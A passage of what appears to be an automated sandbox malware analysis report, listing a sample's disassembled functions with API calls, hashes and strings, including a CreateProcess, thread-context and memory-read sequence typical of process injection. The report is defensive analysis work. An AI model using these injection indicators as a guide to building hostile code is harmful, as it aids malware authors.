                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                      • Opcode ID: a027dea29098a67943c27d9e3ea21c20dae932a4685e4d767b363825c20b79a8
                                                                                                                                                                                                                                                      • Instruction ID: a29cb0e513ac589f58c568b570840443d7e9e6b3108db42e867cd329f4c1fa04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a027dea29098a67943c27d9e3ea21c20dae932a4685e4d767b363825c20b79a8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E113C75615208FFDB208F68CC84EEF7BB8EF55744F10546AE805E7250D6319E42AB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0116D28B
                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0116D321
                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0116D343
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2438371351-0
                                                                                                                                                                                                                                                      • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                                                                                                                      • Instruction ID: cdba3f3ed075c6b9f719233f7ce2363313c05b4691e39bc1a28c6d8c81cb1d33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B622E30A14258DBEB28CFA4D840BDEB375EF58304F1091A9D10DEB394E7769E91CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3877424927-0
                                                                                                                                                                                                                                                      • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                                                                                                                                                      • Instruction ID: ce1e21c36a70f545648f6abbbd179bb10fbdec985012069b28a276a586e6b353
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251BCB0A0068EABDB248F7B884856F77B5AF40324F24972EF425B72D0D7719F508B40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4517: _fseek.LIBCMT ref: 00EC452F
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C65D
                                                                                                                                                                                                                                                        • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C670
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0C4DD
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0C4E4
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0C54F
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE7A85), ref: 00EE1CB1
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1C9D: GetLastError.KERNEL32(00000000,?,00EE7A85), ref: 00EE1CC3
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0C557
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1552873950-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a0e9689712cc86fb3d6977dd485a366c8ca69f90ee4738361ed8cff43ef1dd3
                                                                                                                                                                                                                                                      • Instruction ID: e8813c05a5353f79ed3d60fdc4ef17f9574dbeb11c8cb6bc80df6766d16a893a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0e9689712cc86fb3d6977dd485a366c8ca69f90ee4738361ed8cff43ef1dd3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1514BB5904219AFDF189F64DC81BADBBB9FF48314F1000AEB259B3281DB715A809F58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F33725
                                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 00F3376F
                                                                                                                                                                                                                                                        • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
                                                                                                                                                                                                                                                        • Part of subcall function 00EC40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC40C6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                                                                                                                                                      • Opcode ID: 59895e6d8730373523b2de7e7ea9c9f71ba08ade6be19bbcb01558541a028436
                                                                                                                                                                                                                                                      • Instruction ID: 2095b7840297fa8eb60cfd57b24db4630010814abb824d1f074759af32e6b3ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59895e6d8730373523b2de7e7ea9c9f71ba08ade6be19bbcb01558541a028436
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB21C6B1A10198ABCB01DFD4C845BDE7BF89F49304F00801AE405B7281DBB55A8A9F66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00F0C72F
                                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F0C746
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                      • String ID: aut
                                                                                                                                                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                      • Opcode ID: 5a2d09fc54a73ca9b81d3a6e4e9801b7689427919765bf0621f9d3b0f402925c
                                                                                                                                                                                                                                                      • Instruction ID: b296ac49c75749f7209366eff320a277fc14aa8507e9ec9e2cf1fe829c6b4c54
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a2d09fc54a73ca9b81d3a6e4e9801b7689427919765bf0621f9d3b0f402925c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D05E7550030EBBDB50ABA0EC0EF8A777C9710704F0001A1BB54A50B1DAF0E7999B56
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: a3e698836ae71f283b4c51b286dfa762643913dd266956e2898861af98cc87d9
                                                                                                                                                                                                                                                      • Instruction ID: 94dc8bc1fc1015e002e66d329b8b0d0b27c7ad5f8da2fea4947150c517b7bd7d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3e698836ae71f283b4c51b286dfa762643913dd266956e2898861af98cc87d9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70F16A716083019FC710DF24C981B6AB7E5FF88314F14892EF9959B392DB35E949DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC5022
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC50CB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 928536360-0
                                                                                                                                                                                                                                                      • Opcode ID: 4fa0f7281b294e2325b805bf58b930e5e1307ac7cdd627301fefbb8458c8db88
                                                                                                                                                                                                                                                      • Instruction ID: 5eea8554d17dd275f97528b9b4b317e3c2d8387bbf19cc52a4b0940e5c4490c5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fa0f7281b294e2325b805bf58b930e5e1307ac7cdd627301fefbb8458c8db88
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7931AEB1504B04CFD720DF24D945BEBBBE8FF49308F00092EE59AD2250E7726985DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __FF_MSGBANNER.LIBCMT ref: 00EE3973
                                                                                                                                                                                                                                                        • Part of subcall function 00EE81C2: __NMSG_WRITE.LIBCMT ref: 00EE81E9
                                                                                                                                                                                                                                                        • Part of subcall function 00EE81C2: __NMSG_WRITE.LIBCMT ref: 00EE81F3
                                                                                                                                                                                                                                                      • __NMSG_WRITE.LIBCMT ref: 00EE397A
                                                                                                                                                                                                                                                        • Part of subcall function 00EE821F: GetModuleFileNameW.KERNEL32(00000000,00F80312,00000104,00000000,00000001,00000000), ref: 00EE82B1
                                                                                                                                                                                                                                                        • Part of subcall function 00EE821F: ___crtMessageBoxW.LIBCMT ref: 00EE835F
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1145: ___crtCorExitProcess.LIBCMT ref: 00EE114B
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1145: ExitProcess.KERNEL32 ref: 00EE1154
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1372826849-0
                                                                                                                                                                                                                                                      • Opcode ID: 01ca9a1e33143e0298d65ccba23d4c1525cb78d4416ff374bd552e6ca9fe7c0f
                                                                                                                                                                                                                                                      • Instruction ID: ae061aed65c8e2dab3bc3818e5d0810278562fd92e6f6e14d17f4ab8bd8619be
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01ca9a1e33143e0298d65ccba23d4c1525cb78d4416ff374bd552e6ca9fe7c0f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D01F93234528D9AE7113B37DC4AB7A73C89BC5724F613026F505BB28BDFB19D404660
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F0C385,?,?,?,?,?,00000004), ref: 00F0C6F2
                                                                                                                                                                                                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F0C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F0C708
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00F0C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F0C70F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3397143404-0
                                                                                                                                                                                                                                                      • Opcode ID: c3136f33690cd76cb588c75d3e6e21814f4e0cee5d1ac907f5b35350aa8f1eeb
                                                                                                                                                                                                                                                      • Instruction ID: b1a8125e5f4fc1657ec646848694e79380325f287ab0848029bdef446b365193
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3136f33690cd76cb588c75d3e6e21814f4e0cee5d1ac907f5b35350aa8f1eeb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE08636141218B7E7211F54AC09FCA7B18AB56B70F104210FF14690E097B12511A798
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0BB72
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE7A85), ref: 00EE1CB1
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1C9D: GetLastError.KERNEL32(00000000,?,00EE7A85), ref: 00EE1CC3
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0BB83
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F0BB95
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                      • Opcode ID: 3b7543f732c1b25d447c4e580d332d4dcff599d68c72ee3383d3780db49341c3
                                                                                                                                                                                                                                                      • Instruction ID: 51eb27ea1458f602c59bef133cf75ee27bc1334f51d2428d32bfc1a9158620a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b7543f732c1b25d447c4e580d332d4dcff599d68c72ee3383d3780db49341c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04E012F1A4178147DA38657A6E48EB363CC4F44365724185DB459F7186CF34E880A5A4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00EC24F1), ref: 00EC2303
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EC25A1
                                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EC2618
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F3503A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3815369404-0
                                                                                                                                                                                                                                                      • Opcode ID: 5f1c64dcf5573664529e45c83620f71bc5d002a0b9ca29facd95b6b43c96d61a
                                                                                                                                                                                                                                                      • Instruction ID: 044d1e367f8d23cf9411b6efa7200037147785b33095afc11d4d9437348284b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1c64dcf5573664529e45c83620f71bc5d002a0b9ca29facd95b6b43c96d61a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30719AB490128D8AC704EF6AAE949E5BBECBB99344B84432ED109DB372DB314407FF15
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                                                                                                      • String ID: EA06
                                                                                                                                                                                                                                                      • API String ID: 2638373210-3962188686
                                                                                                                                                                                                                                                      • Opcode ID: 45d8c6d38ed535fc2d7bdd717c54c6a1951992631d21b840611b0db0f67fb5b5
                                                                                                                                                                                                                                                      • Instruction ID: c834ccc5363ae176f1ed30c0b245d22b83cf92f6317db645642ca1aa423609ba
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45d8c6d38ed535fc2d7bdd717c54c6a1951992631d21b840611b0db0f67fb5b5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B01B9729042587EDB18C7A9CC56FEDBBF8DB15301F00455AF553E62C1D574E7049B60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0FEDD
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00F0FF96
                                                                                                                                                                                                                                                      Memory Dump Source
